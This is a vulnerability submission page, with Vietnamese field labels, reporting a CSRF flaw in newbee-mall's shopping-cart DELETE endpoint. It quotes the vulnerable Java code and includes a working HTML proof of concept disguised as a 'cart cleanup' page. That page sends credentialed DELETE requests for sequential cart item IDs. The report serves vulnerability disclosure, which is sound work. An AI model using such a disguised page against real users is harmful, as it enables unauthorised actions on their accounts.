| tiêu đề | newbee-ltd newbee-mall v1.0 CSRF |
|---|
| Mô tả | # CSRF Vulnerability in Shopping Cart Item Deletion
## Summary
A **CSRF vulnerability** exists in the shopping cart deletion endpoint `/shop-cart/{cartItemId}` (DELETE). Attackers can empty users' shopping carts, causing inconvenience and potential loss of carefully curated selections.
## Vulnerability Details
### Configuration-Level Issue
**File**: `src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java`
```java
@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
public void addInterceptors(InterceptorRegistry registry) {
registry.addInterceptor(newBeeMallLoginInterceptor)
.addPathPatterns("/shop-cart/**");
// ❌ No CSRF token validation
}
}
```
### Endpoint-Level Code Analysis
**File**: `src/main/java/ltd/newbee/mall/controller/mall/ShoppingCartController.java` (Lines 93-105)
```java
@DeleteMapping("/shop-cart/{newBeeMallShoppingCartItemId}")
@ResponseBody
public Result updateNewBeeMallShoppingCartItem(@PathVariable("newBeeMallShoppingCartItemId") Long newBeeMallShoppingCartItemId,
HttpSession httpSession) {
NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
// ❌ No CSRF token validation
// ⚠️ Cart item IDs are sequential and predictable
Boolean deleteResult = newBeeMallShoppingCartService.deleteById(newBeeMallShoppingCartItemId, user.getUserId());
if (deleteResult) {
return ResultGenerator.genSuccessResult();
}
return ResultGenerator.genFailResult(ServiceResultEnum.OPERATE_ERROR.getResult());
}
```
**Security Issues**:
1. ❌ No CSRF token validation
2. ⚠️ Cart item IDs are predictable (sequential integers)
3. ⚠️ Can delete multiple items in batch
## Proof of Concept (PoC)
```html
<!DOCTYPE html>
<html>
<head>
<title>Cart Cleanup Service</title>
</head>
<body>
<h2>???? Cleaning expired items from cart...</h2>
<div id="progress">Processing...</div>
<script>
// Delete cart items by guessing sequential IDs
var deletedCount = 0;
for (var i = 1; i <= 100; i++) {
fetch('http://localhost:28089/shop-cart/' + i, {
method: 'DELETE',
credentials: 'include'
})
.then(response => response.json())
.then(data => {
if (data.resultCode == 200) {
deletedCount++;
document.getElementById('progress').innerHTML =
'Removed ' + deletedCount + ' expired items';
}
});
}
setTimeout(function() {
document.getElementById('progress').innerHTML = '✅ Cart cleanup complete!';
}, 3000);
</script>
</body>
</html>
```
## Impact
**Shopping cart emptying causing user inconvenience** - Users lose their saved shopping selections and must recreate their carts, leading to frustration and potential business loss.
---
**CVSS Score**: 5.3 (Medium)
|
|---|
| Nguồn | ⚠️ https://github.com/newbee-ltd/newbee-mall/issues/112 |
|---|
| Người dùng | flashzyc (UID 92850) |
|---|
| Đệ trình | 05/02/2026 11:57 (cách đây 4 các tháng) |
|---|
| Kiểm duyệt | 18/02/2026 07:56 (13 days later) |
|---|
| Trạng thái | Bản sao |
|---|
| Mục VulDB | 346456 [newbee-ltd newbee-mall đến a069069b07027613bf0e7f571736be86f431faee Multiple Endpoints Giả mạo yêu cầu liên trang] |
|---|
| điểm | 0 |
|---|